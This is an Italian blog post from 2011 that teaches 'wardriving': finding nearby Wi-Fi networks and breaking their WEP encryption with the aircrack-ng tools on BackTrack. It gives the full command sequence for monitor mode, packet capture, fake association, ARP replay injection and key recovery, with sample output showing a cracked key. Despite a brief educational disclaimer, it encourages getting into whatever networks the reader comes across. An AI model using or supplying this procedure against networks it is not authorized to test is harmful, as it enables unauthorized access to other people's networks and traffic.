domenica 31 luglio 2011

Wardriving: accesso alle reti wifi protette. Il WEP.

Disclaimer: Questo articolo ha scopo puramente educativo. L’autore declina qualsiasi responsabilità dell’uso che verrà fatto di tali informazioni.
In questi ultimi anni stiamo assistendo ad una diffusione in larga scala della tecnologia wireless. Basta fare una passeggiata nella nostra città con un palmare, un hot-spot finder o un palmare per renderci conto che in ogni angolo è disponibile almeno una rete wifi. Ecco come nasce il wardriving.

Ma cos’è il wardriving? Il wardriving è a metà tra l’hacking e la caccia:prendete un portatile, possibilmente con una scheda wireless potente e/o un’antenna che ne estende la portata, salite in macchina e cominciate a scovare ed accedere avvalendovi di svariate tecniche alle reti che vi si presentano: sarete dei wardriver!
Per quanto riguarda le risorse necessarie: va bene un computer qualsiasi (anche fisso se fate tutto da casa, o un umpc come l’asus eeepc se volete maggior mobilità), una scheda wifi che monti un chip compatibile con la suite di programmi aircrack-ng (necessaria ad avere accesso alle reti protette) e possibilmente una distribuzione Linux (questo perchè sotto windows aircrack è compatibile soltanto con un tipo di schede wifi).
A mio avviso la miglior distribuzione per il wardriving (ma anche per l’hacking in generale) èBackTrack, che potete scaricare da qui, scegliendo “cd image” se desiderate scaricare un iso da masterizzare su cd, o usb version se volete installarla su pen drive (vi spiegherò come in un altro articolo). Basra poi inserire il supporto creato all’avvio del pc per poter avviare direttamente questo sistema operativo.
Backtrack integra i driver per la maggior parte delle schede wifi e tutti i programmi necessari… Diciamo che è il metodo “pappa pronta”!
Partendo dal presupposto che siamo già su Backtrack o una qualsiasi altra distribuzione con driver e suite aircrack installati, come ci muoviamo?
Per prima cosa entriamo nel terminale e logghiamoci come root (generalmente digitando su e inserendo la password da amministratore quando viene richiesta).
Adesso dobbiamo vedere se ci sono reti wireless disponibili, e per fare ciò dobbiamo mandare la scheda wifi in modalità monitor. Se siamo esperti lo facciamo a mano, altrimenti (e lo consiglio) digitiamo nel terminale:
airmon-ng start xxx
(al posto delle “x” va il nome della scheda wifi, per esempio “wlan0″, ci rendiamo facilmente conto del nome della nostra scheda digitando iwconfig sul terminale). Per semplicità da adesso in poi chiameremo la scheda “wlan0″, ma voi ricordatevi di mettere il nome corretto quando digitate i comandi!
Per cercare le reti digitiamo sul terminale:
airodump-ng wlan0
avremo un risultato simile a questo:
airodump-ngairodump-ng

avremo quindi la lista degli access points (i modem/router) disponibili nel nostro raggio d’azione nella sezione superiore, e la lista dei pc con accesso wireless nella sezione sottostante. Avremo qui tutte le informazioni che ci serviranno, come il mac address (BSSID), la potenza del segnale (PWR), i pacchetti trasmessi (Beacons e Data, ma ci interesseranno quelli sotto Data), il canale di trasmissione utilizzato (CH), la banda di trasmissione (MB, e cio’ MegaBits), il tipo di protezione utilizzata (ENC, quindi se aperta,wpa,wpa2 o wep) ed infine il nome della rete (ESSID).
In questo articolo spiegheremo come accedere ad una rete con protezione WEP (per il wpa/wpa2 date un’occhiata qui ) sia che abbia un client connesso che non (in questo caso ci metteremo un po’ di più).
Procediamo adesso all’attacco vero e proprio: segnamoci (anche in un pezzo di carta) i dati relativi alla rete che ci interessa crackare (ESSID,BSSID e canale), in questo caso prendiamo quella con una potenza maggiore e protezione wep. e clickiamo CTRL+C per chiudere l’esecuzione di airodump.
Adesso iniziamo a raccogliere i dati scambiati dalla rete che ci interessa, salvandoli su un file con estensione ivs, che verrà poi analizzato per restituirci la password.
Digitiamo:
airodump-ng -c <canale> -b <BSSID> -w pacchetti.ivs wlan0
In questo modo catturiamo le informazioni che ci interessano su un file. Per il crack di una rete wep abbiamo bisogno di circa 50.000 ivs (i pacchetti sotto la dicitura “Data”), con le recenti versioni di aircrack o dai 250.000 ai 500.000 ivs circa, con le versioni precedenti. Non è possibile stabilire con certezza il numero di ivs necessari, ma diciamo che più ne abbiamo meglio è…
A questo punto lasciamo il processo che abbiamo lanciato attivo e apriamo un altro terminale (o un’altra cheda dello stesso terminale).
Associamoci alla rete (prendendo in giro il router :-P )
Digitiamo:
aireplay-ng -1 0 -a <BSSID della rete> -h <BSSID del client già connesso o uno inventato> wlan0
Apriamo un terzo terminale o una terza scheda dove digitiamo:
aireplay-ng -3 -b <BSSID dell’AP> -h <BSSID del client> wlan0
A questo punto attendiamo un po’ (dipende se la rete è usata in quel momento o meno, nel primo caso non ci vorrà molto) che la rete scambi i pacchetti che ci interessano.
Vedremo che il programma appena catturato il primo pacchetto comincierà a mandarne parecchi al secondo ricevendone quindi ancora indietro (accumulando così più velocemente i dati che ci ineteressano), visualizzeremo qualcosa del genere:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets…
Raggiunto un numero considerevole di pacchetti (che potrete tenere sotto controllo nel primo terminale sotto la scritta “Data”), diciamo 100.000, bloccate tutti i processi (premendo CTRL+C in ogni terminale) e digitate nel primo:
aircrack-ng -z pacchetti.ivs
Un esempio di esecuzione di aircrack con successo:
[00:01:18] Tested 0/140000 keys (got 30680 IVs)
KB depth byte(vote)
0 0/ 1 12( 170) 35( 152) AA( 146) 17( 145) 86( 143) F0( 143) AE( 142) C5( 142) D4( 142) 50( 140)
1 0/ 1 34( 163) BB( 160) CF( 147) 59( 146) 39( 143) 47( 142) 42( 139) 3D( 137) 7F( 137) 18( 136)

[...]
KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%
La password è quella tra le parentesi quadre meno i due punti, in questo caso la password è1234567890.
Ovviamente vi sono altre tecniche da utilizzare, ma di quelle ne parleremo in seguito, oppure date un’occhiata nel manuale di aircrack-ng.
Buon Wardriving! 8-)

+++APPUNTO SULLE SCHEDE ATHEROS+++
A volte il comando airmon-ng start ath0 da errore VAP e non manda la scheda in modalità monitor .
In questo caso digitate airmon-ng stop ath0, successivamente iwconfig con il quale dovreste vedere wifi0 (o 1,2,3 ecc…)tra i risultati, a questo punto digitate airmon-ng start wifi0 (o come appariva in iwconfig) e ci troveremo di nuovo ath0 (ath1,ath2 ecc…) in modalità monitor.
Da qui possiamo proseguire normalmente utilizzando adesso ath0 (o quello che è) per i successivi comandi.
Ovviamente per effettuare tutte queste operazioni bisogna avere i driver madwifi installati, oppure utilizzare una distribuzione che li integri di suo, come Backtrack.

Nessun commento:

Posta un commento